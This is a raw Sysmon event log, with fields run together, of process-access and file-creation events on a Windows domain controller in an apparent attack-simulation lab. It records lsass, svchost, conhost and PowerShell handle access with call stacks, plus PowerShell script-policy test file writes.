10:39:56.682{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1800-000000007F01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000994Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:56.682{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1900-000000007F01}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000993Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:56.682{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1800-000000007F01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000992Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:56.682{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1900-000000007F01}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000991Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:55.807{733EE690-3DF9-5F80-1C00-000000007F01}2196C:\Windows\System32\RemoteFXvGPUDisablement.exeC:\Windows\Temp\__PSScriptPolicyTest_qlbtohfa.4mf.ps12020-10-09 10:39:55.807 11241100x8000000000000000990Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:55.714{733EE690-3DF9-5F80-1800-000000007F01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_lxek3wu4.zed.ps12020-10-09 10:39:55.714 11241100x8000000000000000989Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:55.714{733EE690-3DF9-5F80-1900-000000007F01}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_wo5l54qv.523.ps12020-10-09 10:39:55.714 10341000x8000000000000000988Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:55.589{733EE690-3DF9-5F80-1200-000000007F01}12082012C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|c:\windows\system32\es.dll+118e5|c:\windows\system32\es.dll+13b72|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be 10341000x8000000000000000987Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:55.589{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000986Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:55.589{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000985Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:55.573{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000984Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:55.573{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000983Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:55.573{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000982Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:55.260{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1800-000000007F01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000981Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:55.260{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1900-000000007F01}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000980Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.432{733EE690-3DF9-5F80-1A00-000000007F01}21762480C:\Windows\system32\conhost.exe{733EE690-3DF9-5F80-1800-000000007F01}2104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000979Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.432{733EE690-3DFA-5F80-2100-000000007F01}24362472C:\Windows\system32\conhost.exe{733EE690-3DF9-5F80-1C00-000000007F01}2196C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000978Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.432{733EE690-3DFA-5F80-1F00-000000007F01}22882476C:\Windows\system32\conhost.exe{733EE690-3DFA-5F80-1E00-000000007F01}2280C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000977Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.432{733EE690-3DF9-5F80-1B00-000000007F01}21842468C:\Windows\system32\conhost.exe{733EE690-3DF9-5F80-1900-000000007F01}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000976Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.417{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}2436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000975Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.370{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DFA-5F80-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000974Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.370{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DFA-5F80-2000-000000007F01}2376C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000973Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000972Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000971Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000970Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000969Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000968Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:54.261{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000967Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 